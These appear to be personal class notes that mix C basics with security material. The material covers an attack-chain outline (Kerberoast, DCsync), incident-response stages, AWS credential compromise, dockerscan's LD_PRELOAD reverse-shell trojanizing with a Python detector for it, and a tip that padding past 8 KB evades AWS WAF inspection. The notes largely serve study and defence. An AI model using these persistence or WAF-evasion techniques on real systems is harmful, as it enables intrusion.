Variables - numbers, characters, text, decimal numbers, etc. int = integer (a whole number, no decimals), double = decimal number, float = smaller decimal number, char = one single character in single quotes, e.g. 'A'. To create a string of characters use an array: char name[] = "lewis";
Store single characters with char, e.g. char variablename = 'G'; To store multiple characters in one variable, like a name, use a char array: char variablename[] = "lewis";
To store whole numbers (integers) use int, e.g. int samplenumber = 35;
Variables are printed with printf using a format specifier: a percent sign % followed by the letter for the data type (%d int, %f float/double, %c char, %s string).
Example:
#include <stdio.h>

int main(void) {
    char variablename[] = "lewis";
    int samplenumber = 35;
    printf("%s is a man.\n", variablename);
    printf("lewis is %d years old.\n", samplenumber);
    return 0;
}
Function (called a method in other languages) - a container where you put code. ";" ends an instruction, "\n" is a newline, and "\" (backslash) escapes the next character, for instance to print a literal quote: printf("He said \"hi\"\n"); Example of the printf function: printf("There once was a man named george\n");
sample attack chain
Initial access through phishing
Kerberoast
DCsync
Dump registry
_________________________
Gain access - Initial access, Defense evasion, C2E
Establish foothold - Persistence, Discovery
Obtain Privs - Credential access, privesc, lateral movement
Process injection / Process hollowing
Freeze framework
Tpmtool - Tool can be used
ProcMon -https://gist.github.com/egre55/1df7db9c13648097f997432019f4a8e1
chisel - https://www.youtube.com/watch?v=pbR_BNSOaMk
#Preparation
Policy Development
Plan Creation
Team Formation
Tools and Resources
Training
Legal and Compliance Review
Integration with Business Continuity
#Detection
Monitoring
Detection Engineering
Threat Hunting
Threat Intelligence
Anomaly Detection
Security Assessment
#Triage
Severity Assessment
Incident Categorization
Escalation
Stakeholder Communication
Resource Allocation
#Containment
Network Isolation
Logical Access Isolation
Forensics Automation
Communication with Affected Parties
Patch Management
Resource Disablement
#Analysis
Data Collection
Forensic Analysis
Log Analysis
Root Cause Analysis
Timeline Reconstruction
Security Posture Assessment
#Remediation
Patch Management
Credential Reset
Threat Eradication
Configuration Changes
Security Enhancements
Hardening
Documentation
# Recovery
# Post-Incident Activity
Incident response is a structured approach used to manage and address security breaches, cyberattacks, or other threats to an organization’s systems and data. The goal is to effectively manage the situation to minimize damage, reduce recovery time, and mitigate any future risk. The incident response process generally follows a cycle of well-defined principles and stages.
1. Preparation - the first principle and critical to handling incidents effectively: the better prepared you are, the quicker you can respond. This includes:
- Developing an Incident Response Plan: a documented procedure detailing how incidents will be identified, reported, and managed.
- Establishing a Response Team: a dedicated team trained to handle security incidents (usually called the Computer Security Incident Response Team, or CSIRT).
- Training: regularly training staff on security policies and awareness.
- Tools and Resources: ensuring the right tools (e.g., detection systems, logging tools) and resources are in place.
2. Identification - detect and accurately determine whether an incident has occurred:
- Monitoring Systems: continuously monitoring network traffic, endpoints, and logs for suspicious activity.
- Initial Assessment: once a potential incident is identified, confirm whether it is an actual security incident.
- Classifying the Incident: determine the type, severity, and impact of the incident to prioritize how the response proceeds.
3. Containment - once an incident is identified, the first priority is to contain it to prevent further damage. Containment splits into two phases:
- Short-term Containment: stop the spread or impact of the attack, e.g. isolating compromised systems, closing off network segments, or disabling user accounts.
- Long-term Containment: restore affected systems securely, e.g. applying security patches, taking system backups, or preparing for full recovery while preserving forensic evidence.
4. Eradication - remove the root cause of the incident:
- Eliminating the Threat: removing malware, cleaning up infected systems, and closing exploited vulnerabilities.
- Verification: confirming the threat is fully removed by scanning systems and reviewing logs for any remaining traces of the attacker or malware.
5. Recovery - restore and validate the affected systems:
- Restoring Systems: bringing systems back online safely, ensuring they are clean and secure.
- Testing: verifying that systems function normally with no signs of reinfection or remaining vulnerabilities.
- Monitoring: watching closely for abnormal behaviour or follow-up attacks after recovery.
6. Lessons Learned - review what happened, how it was handled, and how the organization can improve its defenses:
- Post-Incident Review: a meeting with the incident response team and stakeholders to go over what happened, what worked well, and what didn't.
- Documenting the Incident: an incident report detailing the incident, including timelines, actions taken, and lessons learned.
- Improving the Incident Response Plan: updating policies, procedures, and security controls based on the review.
Key Principles of Incident Response:
- Speed and Efficiency: respond as quickly as possible to minimize damage and disruption.
- Containment over Eradication: contain first to stop the spread of damage, then focus on eliminating the threat.
- Documentation: document everything throughout the process to keep a clear record for analysis and for legal or compliance requirements.
- Communication: clear, consistent communication between the incident response team, stakeholders, and external parties (e.g., legal teams or law enforcement).
- Continuous Improvement: every incident should yield insights that improve future response and reduce vulnerabilities.
Typical AWS compromise pattern:
- Adversary gains a foothold in the account through compromised credentials
  - User credentials => AWS Access Key and Secret Key
  - Service tokens => AWS Access Key, Secret Key and Session Token
- Leverages the credentials to escalate privileges
- Performs one or more techniques, depending on objective, configuration and so on
How to develop persistence in AWS and other cloud platforms ?
dockerscan is a tool that can trojanize a Docker image with a reverse shell. It does this with LD_PRELOAD: the dynamic loader maps the listed library into every dynamically linked process started in the container, so the image's original entrypoint runs unchanged while the preloaded library spawns the shell. An unexpected LD_PRELOAD in an image's environment (or an entry in /etc/ld.so.preload) is therefore a sign that the image may have been tampered with.
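An added check (not from the original notes, and not dockerscan's own code) for the LD_PRELOAD indicator described above. It inspects the Env of an image config as returned by docker image inspect, plus the contents of /etc/ld.so.preload if you have pulled it from the image's layers; the image config below is constructed and TRUSTED_LIB_DIRS is an assumption.

```python
# Added example (not from the original notes or from dockerscan): flag the
# LD_PRELOAD-style injection described above in a container image. Reads the
# image config that `docker image inspect` prints, plus /etc/ld.so.preload
# from the image filesystem if you extracted it. The config below is constructed.
import json

# Directories a legitimately preloaded library would normally live in (assumption).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

SAMPLE_IMAGE_CONFIG = json.loads("""
{"Config": {"Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                    "LD_PRELOAD=/dev/shm/.x/libshell.so"],
            "Cmd": ["nginx", "-g", "daemon off;"]}}
""")


def env_to_dict(env: list) -> dict:
    """Turn ['KEY=value', ...] from an image config into a dict (value may contain '=')."""
    out = {}
    for item in env:
        key, _, value = item.partition("=")
        out[key] = value
    return out


def preload_indicators(image_config: dict, ld_so_preload: str = "") -> list:
    """Return human-readable indicators that a library is preloaded in the image.

    Both LD_PRELOAD in the environment and entries in /etc/ld.so.preload make
    the dynamic loader map the listed library into every dynamically linked
    process, which is how a reverse shell can ride along with an unmodified
    entrypoint.
    """
    findings = []
    env = env_to_dict(image_config.get("Config", {}).get("Env", []))
    paths = []
    if "LD_PRELOAD" in env:
        findings.append(f"LD_PRELOAD set in image Env: {env['LD_PRELOAD']}")
        paths += env["LD_PRELOAD"].replace(":", " ").split()
    for raw in ld_so_preload.splitlines():
        entry = raw.split("#", 1)[0].strip()   # ld.so.preload allows # comments
        if entry:
            findings.append(f"/etc/ld.so.preload lists {entry}")
            paths.append(entry)
    for p in paths:
        if not p.startswith(TRUSTED_LIB_DIRS):
            findings.append(f"preloaded library outside system library dirs: {p}")
    return findings


if __name__ == "__main__":
    for line in preload_indicators(SAMPLE_IMAGE_CONFIG):
        print("INDICATOR:", line)
```

A preload from a system library directory is not proof of tampering (some monitoring agents are installed that way), which is why the path check is reported separately from the presence check.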
https://github.com/aquasecurity/trivy - Trivy is a comprehensive and versatile security scanner. Trivy has scanners that look for security issues, and targets where it can find those issues.
Targets (what Trivy can scan): Container Image, Filesystem, Git Repository (remote), Virtual Machine Image, Kubernetes, AWS
kubeshark hubble
7-October-24 class Questions:
Layered file system? Union mounting
unzip an ipa - unzip app.ipa -d app
- AWS WAF, like a number of other WAFs, inspects only the first 8 KB of a request body by default (newer AWS WAF versions let you raise the limit); a payload placed after 8 KB of padding can pass uninspected.
- Microsoft teams installs its application files in the users local profile folder - %LocalAppData%\Microsoft\Teams directory within each user's profile. This per-user installation approach allows Teams to update itself without requiring administrative privileges.